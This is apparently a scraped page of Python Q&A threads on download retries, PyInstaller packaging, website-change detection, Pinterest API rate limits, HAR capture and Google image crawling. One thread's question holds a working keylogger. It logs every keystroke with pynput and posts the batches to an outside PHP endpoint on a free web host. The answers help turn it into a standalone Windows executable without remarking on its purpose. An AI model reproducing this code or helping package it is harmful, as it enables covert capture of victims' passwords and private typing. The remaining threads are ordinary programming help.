Error downloading when using the Python wget lib - python

Is there a way to restart a download if it gets stuck at XX%? I'm scraping and downloading quite a lot of files with the code below. It recovers from connection errors, but it won't restart a download that gets stuck.
for element in elements:
    for attempt in range(100):
        try:
            wget.download(element.get_attribute("href"), path)
        except:
            print("attempt error, retry" + str(attempt))
        else:
            break

It seems there is no feature to restart a download. I looked at many examples for this package -> https://www.programcreek.com/python/example/83386/wget.download. The page for the manual is gone and the pypi.org page does not have any info about a feature like this.
However, you can restart the download yourself by retrying the call in a loop. This code should work for you.
# Retry each download until it succeeds
# The loop gives up on a file after 5 failed attempts
for element in elements:
    downloaded = False
    attempts = 0
    while not downloaded and attempts < 5:
        try:
            wget.download(element.get_attribute("href"), path)
            # Set downloaded flag to end the loop
            downloaded = True
        except Exception:
            attempts += 1
            print("attempt error, retry " + str(attempts))

Another approach is to use the requests library, which is more popular.
import requests

def proceed_files():
    # The download loop gives up on a file after 5 failed attempts
    file_urls = ['list', 'of', 'file urls']
    for url in file_urls:
        downloaded = False
        attempts = 0
        while not downloaded and attempts < 5:
            if download_file(url):
                downloaded = True
            else:
                attempts += 1

def download_file(url):
    try:
        request = requests.get(url, allow_redirects=True)
        # Take the last path segment as the file name
        file_name = url.split('/')[-1]
        with open(file_name, 'wb') as f:
            f.write(request.content)
        return True
    except requests.exceptions.RequestException:
        return False
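If the real problem is that the download hangs partway through, note that neither variant above will notice a stalled transfer on its own. One option is a variant of download_file that streams the response with a timeout, so a stalled connection raises an exception and the retry loop can kick in. A minimal sketch (the 30-second timeout and 8192-byte chunk size are arbitrary assumptions, not requirements of the library):

import requests

def download_file(url, timeout=30):
    # Stream the body so a stalled transfer raises requests.exceptions.Timeout
    # instead of hanging forever; the retry loop above can then try again.
    try:
        with requests.get(url, stream=True, timeout=timeout, allow_redirects=True) as r:
            r.raise_for_status()
            file_name = url.split('/')[-1]
            with open(file_name, 'wb') as f:
                for chunk in r.iter_content(chunk_size=8192):
                    f.write(chunk)
        return True
    except requests.exceptions.RequestException:
        return False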

Related

No module named requests found when running exe on Windows 10

When I convert this code with pyinstaller and run it as an exe in a Windows 10 VM, it prints this error.
import pynput
import requests
import json

key_count = 0
keys = []

def on_press(key):
    global key_count
    global keys
    keys.append(str(key))
    key_count += 1
    if key_count >= 10:
        key_count = 0
        send_keys()

def send_keys():
    data = json.dumps({'key_data': ''.join(keys)})
    headers = {'Content-type': 'application/json'}
    keys.clear()
    url = 'https://000webhostapp.com/dog.php'
    try:
        response = requests.post(url, data=data, headers=headers)
        response.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(f'Error: {e}')
    else:
        print('Data sent successfully')

with pynput.keyboard.Listener(on_press=on_press) as listener:
    listener.join()
I need help; thank you in advance. I tried to force pyinstaller to include the module from the command line, but it didn't work and I don't know what to do. Thank you.
As far as I can see from what you said, you are not using a virtualenv. You installed Python directly on your computer and ran the script.
The requests library is not one of the libraries that come with Python by default.
To install it:
python -m pip install requests
For an answer to "What is virtualenv and how do I use it?", with the requests library as the example, see:
https://docs.python-guide.org/dev/virtualenvs/
I already tried your command but I get the same error. I used this command to convert the .py:
pyinstaller --onefile your_script_name.py
Thank you :)
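In case it helps: pip installs requests into whichever Python environment you run it from, so that has to be the same environment PyInstaller uses. If the exe still can't find the module, PyInstaller also lets you declare it explicitly as a hidden import. A rough sketch of the build steps (your_script_name.py is the same placeholder name as above):
python -m pip install requests pyinstaller
pyinstaller --onefile --hidden-import requests your_script_name.py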

Catching website changes with python using urlopen read function

Hi, I am a high school student who has not used Python much, and I am having trouble writing code that checks when a website has been updated. I have looked at different resources and used them to create what I have, but when I run the code it doesn't do what I expect. I expect it to tell me whether a site has been updated or stayed the same since I last checked it. I put some print statements in the code to try to catch the issue, but they only show me that the website has changed, even though it doesn't look like it has changed.
import time
import hashlib
from urllib.request import urlopen, Request

url = Request('https://www.canada.ca/en/immigration-refugees-citizenship/services/immigrate-canada/express-entry/submit-profile/rounds-invitations.html')
res = urlopen(url).read()
current = hashlib.sha224(res).hexdigest()
print("running")
time.sleep(10)

while True:
    try:
        res = urlopen(url).read()
        current = hashlib.sha224(res).hexdigest()
        print(current)
        print(res)
        time.sleep(30)
        res = urlopen(url).read()
        newHash = hashlib.sha224(res).hexdigest()
        print(newHash)
        print(res)
        if newHash == current:
            print("nothing changed")
            continue
        else:
            print("there was a change")
    except AttributeError as e:
        print("error")

The time waiting problem on the Python Pinterest bot

I'm a rookie Python developer trying to do small projects to improve. One of these is a Pinterest bot: it pins the images in a folder to an account with the Pinterest API. The API allows a maximum of 10 image uploads per hour, and I don't want to limit the number of images in the folder. I've tried a few things but can't find a way that works without errors; because I'm inexperienced, I think there's something I can't see. I would appreciate it if you could give me an idea.
I wrote a simple if-else loop that, after uploading ten images from the folder, waits one hour with time.sleep. The API gave a timeout error.
I changed the loop above to wait 7 minutes instead. The API gave a timeout error.
I tried dropping time.sleep to a minute; that works well, but after ten images the API limit becomes a problem.
I defined the code that calls the API as a function with def and placed it in the loop. I thought that wouldn't be a problem because it would restart the API after the sleep phase. It pinned ten images without any issues, but after the sleep, back at the beginning, the API gave a timeout error.
Version with loop:
api = pinterest.Pinterest(token="")
board = ''
note = ''
link = ''
image_list = []
images = open("images.txt", "w")
for filename in glob.glob('images/*.jpg'):
    image_list.append(filename)

i = 0
p = 0
while i < len(image_list):
    if p <= 9 and image_list[i] not in images:
        api.pin().create(board, note, link, image_list[i])
        i += 1
        p += 1
        images.write(image_list[i])
    else:
        time.sleep(3600)
        p = 0
        continue
Version with def:
def dude():
    i = 0
    api = pinterest.Pinterest(token="")
    board = ''
    note = ''
    link = ''
    api.pin().create(board, note, link, image_list[i])
    time.sleep(420)

i = 0
while i < len(image_list):
    dude()
    i += 1
    print(i)
After trying a lot of things, I was able to solve the problem with the retrying library. First I installed the library with the following command.
$ pip3 install retrying
After the installation, I changed my code as follows and the bot started working properly without any API or timeout errors.
from retrying import retry
import glob
import time
# plus the Pinterest API client used above

image_list = []
images = open("images.txt", "w")
for filename in glob.glob('images/*.jpg'):
    image_list.append(filename)

@retry
def dude():
    api = pinterest.Pinterest(token="")
    board = ''
    note = ''
    link = ''
    api.pin().create(board, note, link, image_list[i])

i = 0
while i < len(image_list):
    dude()
    i += 1
    time.sleep(420)
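For anyone tuning this further: a bare @retry retries forever on any exception. The retrying library also accepts keyword arguments that control the policy, which avoids looping endlessly on a hard failure. A small sketch under that assumption (upload_one is a hypothetical stand-in for the api.pin().create call above):

from retrying import retry

# Wait 7 minutes (420000 ms) between attempts and stop after 5 failures
# instead of retrying forever.
@retry(wait_fixed=420000, stop_max_attempt_number=5)
def upload_one(path):
    print("uploading", path)  # replace with api.pin().create(board, note, link, path)

upload_one("images/example.jpg")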

Incomplete HAR list using Python: Browsermobproxy, selenium, phantomJS

Fairly new to Python; I learn by doing, so I thought I'd give this project a shot. I'm trying to create a script which finds the Google Analytics request for a certain website, parses the request payload, and does something with it.
Here are the requirements:
Ask the user for 2 urls (for comparing the payloads from 2 different HAR captures)
Use selenium to open the two urls, and browsermobproxy/phantomJS to capture all the HAR entries
Store the HAR as a list
From the list of all HAR entries, find the Google Analytics request, including the payload
If a Google Analytics tag is found, then do things... like parse the payload, compare the payloads, etc.
Issue: Sometimes, for a website that I know has Google Analytics (e.g. nytimes.com), the HAR that I get is incomplete, i.e. my program will say "GA not found", but that's only because the complete HAR was not captured, so when the regex ran to find the matching entry it wasn't there. This issue is intermittent and does not happen all the time. Any ideas?
I'm thinking that due to some dependency or latency, the script moved on before the complete HAR got captured. I tried the "wait for traffic to stop" call but maybe I didn't do something right.
Also, as a bonus, I would appreciate any help you can provide on making this script run faster; it's fairly slow. As I mentioned, I'm new to Python, so go easy :)
This is what I've got thus far.
import browsermobproxy as mob
from selenium import webdriver
import re
import sys
import urlparse
import time
from datetime import datetime

def cleanup():
    s.stop()
    driver.quit()

proxy_path = '/Users/bob/Downloads/browsermob-proxy-2.1.4-bin/browsermob-proxy-2.1.4/bin/browsermob-proxy'
s = mob.Server(proxy_path)
s.start()
proxy = s.create_proxy()

proxy_address = "--proxy=127.0.0.1:%s" % proxy.port
service_args = [proxy_address, '--ignore-ssl-errors=yes', '--ssl-protocol=any']  # so that I can do https connections
driver = webdriver.PhantomJS(executable_path='/Users/bob/Downloads/phantomjs-2.1.1-windows/phantomjs-2.1.1-windows/bin/phantomjs', service_args=service_args)
driver.set_window_size(1400, 1050)

urlLists = []
collectTags = []
gaCollect = 0
varList = []

for x in range(0, 2):  # I want to ask the user for 2 inputs
    url = raw_input("Enter a website to find GA on: ")
    time.sleep(2.0)
    urlLists.append(url)
    if not url:
        print "You need to type something in...here"
        sys.exit()

# gets the two user urls and stores them in a list
for urlList in urlLists:
    print urlList, 'start 2nd loop'  # printing for debug purposes, no need for this
    if not urlList:
        print 'Your Url list is empty'
        sys.exit()
    proxy.new_har()
    driver.get(urlList)
    # proxy.wait_for_traffic_to_stop(15, 30)  # <-- tried this but it did not do anything
    for ent in proxy.har['log']['entries']:
        gaCollect = (ent['request']['url'])
        print gaCollect
        if re.search(r'google-analytics.com/r\b', gaCollect):
            print 'Found GA'
            collectTags.append(gaCollect)
            time.sleep(2.0)
            break
        else:
            print 'No GA Found - Ending Prog.'
            cleanup()
            sys.exit()

cleanup()
This might be a stale question, but I found an answer that worked for me.
You need to change two things:
1 - Remove sys.exit() -- this causes your programme to stop after the first iteration through the ent list, so if what you want is not the first thing, it won't be found
2 - call new_har with the captureContent option enabled to get the payload of requests:
proxy.new_har(options={'captureHeaders':True, 'captureContent': True})
See if that helps.
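Putting both changes together, the capture loop from the question might end up looking roughly like this (a sketch only; it keeps the question's variable names and Python 2 style, and uses for/else so the "not found" branch runs once per url instead of exiting the program):

for urlList in urlLists:
    # captureContent is needed so request payloads end up in the HAR
    proxy.new_har(options={'captureHeaders': True, 'captureContent': True})
    driver.get(urlList)
    for ent in proxy.har['log']['entries']:
        gaCollect = ent['request']['url']
        if re.search(r'google-analytics.com/r\b', gaCollect):
            print 'Found GA'
            collectTags.append(gaCollect)
            break
    else:
        # no entry matched for this url; move on instead of exiting
        print 'No GA Found for', urlList

cleanup()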

Crawl images from google search with python

I am trying to write a script in Python to crawl images from Google search. I want to collect the urls of the images and then store those images on my computer. I found code to do so, but it only retrieves 60 urls; after that a timeout message appears. Is it possible to retrieve more than 60 images?
My code:
import os
import json
import time
import urllib
import requests

def crawl_images(query, path):
    BASE_URL = 'https://ajax.googleapis.com/ajax/services/search/images?' \
               'v=1.0&q=' + query + '&start=%d'
    BASE_PATH = os.path.join(path, query)
    if not os.path.exists(BASE_PATH):
        os.makedirs(BASE_PATH)
    counter = 1
    urls = []
    start = 0  # Google's start query string parameter for pagination.
    while start < 60:  # Google will only return a max of 56 results.
        r = requests.get(BASE_URL % start)
        for image_info in json.loads(r.text)['responseData']['results']:
            url = image_info['unescapedUrl']
            print url
            urls.append(url)
            image = urllib.URLopener()
            try:
                image.retrieve(url, "model runway/image_" + str(counter) + ".jpg")
                counter += 1
            except IOError, e:
                # Throw away some gifs...blegh.
                print 'could not save %s' % url
                continue
        print start
        start += 4  # 4 images per page.
        time.sleep(1.5)

crawl_images('model runway', '')
Have a look at the documentation: https://developers.google.com/image-search/v1/jsondevguide
You should get up to 64 results:
Note: The Image Searcher supports a maximum of 8 result pages. When combined with subsequent requests, a maximum total of 64 results are available. It is not possible to request more than 64 results.
Another note: you can restrict the file type, so you don't need to ignore gifs, etc.
And as an additional note, please keep in mind that this API should only be used for user operations and not for automated searches!
Note: The Google Image Search API must be used for user-generated searches. Automated or batched queries of any kind are strictly prohibited.
You can try the icrawler package. Extremely easy to use. I've never had problems with the number of images to be downloaded.
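For reference, a minimal sketch of what that might look like with icrawler's built-in Google crawler (the keyword, output directory, and max_num value are just placeholders):

from icrawler.builtin import GoogleImageCrawler

# Download up to 200 images matching the query into ./model_runway
crawler = GoogleImageCrawler(storage={'root_dir': 'model_runway'})
crawler.crawl(keyword='model runway', max_num=200)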
